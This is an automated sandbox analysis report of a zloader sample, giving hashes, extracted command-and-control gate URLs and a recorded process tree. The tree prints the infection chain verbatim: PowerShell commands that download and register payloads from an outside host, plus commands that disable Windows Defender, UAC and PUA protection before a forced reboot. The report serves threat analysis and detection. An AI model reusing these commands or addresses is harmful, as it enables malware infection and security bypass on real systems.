Analysis
-
max time kernel
52s -
max time network
120s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
16-08-2021 11:42
Static task
static1
Behavioral task
behavioral1
Sample
8f87fe90d589a4fa73cff6a242fe222b.exe
Resource
win7v20210410
Errors
General
-
Target
8f87fe90d589a4fa73cff6a242fe222b.exe
-
Size
165KB
-
MD5
8f87fe90d589a4fa73cff6a242fe222b
-
SHA1
381e33872d0f6f1a7233beeb6e9524435c2a9ab6
-
SHA256
edaabcb2e82b51c9b8df54dc82afc494bff804b1b187c4657ab583e8ca0bd052
-
SHA512
f0ce6885ac47429df5a1a0779c9a455300d77284ef71ff1e344afe2344513b430705ce50d62fceddb051cb5df8b67e1c4969b377413647f4cbe23fc87351aca0
Malware Config
Extracted
zloader
ivan
ivan
https://iqowijsdakm.com/gate.php
https://wiewjdmkfjn.com/gate.php
https://dksaoidiakjd.com/gate.php
https://iweuiqjdakjd.com/gate.php
https://yuidskadjna.com/gate.php
https://olksmadnbdj.com/gate.php
https://odsakmdfnbs.com/gate.php
https://odsakjmdnhsaj.com/gate.php
https://odjdnhsaj.com/gate.php
https://odoishsaj.com/gate.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 1772 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 3892 regsvr32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
8f87fe90d589a4fa73cff6a242fe222b.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 8f87fe90d589a4fa73cff6a242fe222b.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 8f87fe90d589a4fa73cff6a242fe222b.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3404 timeout.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1772 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
8f87fe90d589a4fa73cff6a242fe222b.execmd.exeregsvr32.exedescription pid process target process PID 3164 wrote to memory of 2192 3164 8f87fe90d589a4fa73cff6a242fe222b.exe cmd.exe PID 3164 wrote to memory of 2192 3164 8f87fe90d589a4fa73cff6a242fe222b.exe cmd.exe PID 2192 wrote to memory of 1772 2192 cmd.exe powershell.exe PID 2192 wrote to memory of 1772 2192 cmd.exe powershell.exe PID 2192 wrote to memory of 1936 2192 cmd.exe regsvr32.exe PID 2192 wrote to memory of 1936 2192 cmd.exe regsvr32.exe PID 1936 wrote to memory of 3892 1936 regsvr32.exe regsvr32.exe PID 1936 wrote to memory of 3892 1936 regsvr32.exe regsvr32.exe PID 1936 wrote to memory of 3892 1936 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\SYSTEM32\cmd.execmd /c start.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/JavaP.dll -OutFile JavaP.dll3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772 -
C:\Windows\system32\regsvr32.exeregsvr32 JavaP.dll3⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\regsvr32.exeJavaP.dll4⤵
- Loads dropped DLL
PID:3892 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe5⤵PID:2876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat3⤵PID:2072
-
C:\Windows\system32\cmd.execmd /c nsudo.bat3⤵PID:2548
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"4⤵PID:340
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe4⤵PID:2768
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f4⤵PID:2128
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T sc config WinDefend start= disabled4⤵PID:3700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat4⤵PID:3952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force4⤵PID:1052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"4⤵PID:3588
-
C:\Windows\system32\shutdown.exeshutdown.exe /r /f /t 004⤵PID:3252
-
C:\Windows\system32\timeout.exetimeout 163⤵
- Delays execution with timeout.exe
PID:3404
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d1⤵PID:3868
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
56efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
MD5
c9a869799efa0f9da58092ac82fc5cf4
SHA18158751848f8806ce9d35433802109858e32ea35
SHA25685c922b298880c6c8ff1e33d0655971d09ddf3d130338958673c7e3799554df6
SHA51276e2089aad3ae2c9fe895ca6895405b6351984104e6e972d78c78f8e88892527adccf52b8855daf37ebbf486a6e8086937e9bf982f88fd540b95bbc7ec081449
-
MD5
76a2faa51e5223c5fe52dea278682941
SHA11eef0fe778d6798a2871a8bb157e6ee6a53f7b56
SHA256652d5d4b41cfdeaf0cdbf27b665f1c02177b6a36e326c3ed07b413e2b9127b4d
SHA512f29f92c3f1c379f63958fc94991e06df264636e59d25525adb86f986f7e3a04110233e41974c7ceeb18c174a2869d37d8e0eec86b5def50f9ee62dd43a1611bb
-
MD5
211b497e2692909e96e216b5e4934d76
SHA1fcaef00fefbde139fe9682c778b8475bf996dc6d
SHA2568cfd11db0c8c1d78a2265ea869f9f0048bbfddb071ee67b03bbed7c056d7eabf
SHA5128eddc4359341293578d6b0eb2d3fd4f229657185f809794c750c46c74bc4d8f0406727d8b9070035b7bda94bb99d8e04bd34b6dbea46fb8534b3ccf53186940e
-
MD5
6affe9382dfe0de4672fb122005c0880
SHA1d06df962c20edc629a88c5b9f8ffbbf0b59f4c22
SHA2562cef36bd8e08adeaee9783308a8cc49266ed0d9097eb031a07a655a55beee305
SHA5126cace93667f22417e4cc5e5d935df1aef131a587823095e464c06d582f95241f828bed640e2935640afd4bef03c51859d7e1007f83a2183c6499ba2ec3260147
-
MD5
8a0e43d8537b255b7fae4ddaca4b604c
SHA1720c6951212c155b1c3d194dee2972fd15024358
SHA2564cd7de3dad825292555ebf690964f5ca322ebb25dad79efc3282191f68c8f4f7
SHA512bf440490b89b0aa2e22c15eb737b1a9d716e3ba1b008b2ecd3802f2149cb1a7ef6203c475ce7eedde71622a66118fdfd857310eb8810f9fa941ec0577bb666bb
-
MD5
676d31dd4a8405ead757e0b72d6bd381
SHA1789a5fc1af78a0630ae705f6dd5506dd476d9d0f
SHA25657d69a6ca957beb5c9eed7f39d0bb56e6d3348bd510fbba10ad0c19438a712b7
SHA51279cc7bd42feb80d9a552f2fd6145795ab1904ca7c8d4175f70f9225b04eddcc7107ebf4391eac9d578ed7b963ce192df58050e73b8eaed30e3ef89405e18028c
-
MD5
23cb9715b98c53a8351d0cfb3d0a24eb
SHA14048470f92c65898b3e7186cc98108b74e4b2171
SHA256bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7
SHA5124b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
6f10d512d4cbb527fd26ae266d0a4aef
SHA16e42d51ff2d42c5f999943b329a655e901ea4b32
SHA256b37efaf69f5484fd2e4ec9c83553b9788e39a10fc4390065c29d59f770f34943
SHA5124f66e8435b8439ace551ad8a70483926891ff3f55b27688602b2e0c58999054bd430308879374f4e8c990a91c3e9cc9cd78b6d355d4370051528bce536e1028e
-
MD5
23cb9715b98c53a8351d0cfb3d0a24eb
SHA14048470f92c65898b3e7186cc98108b74e4b2171
SHA256bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7
SHA5124b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1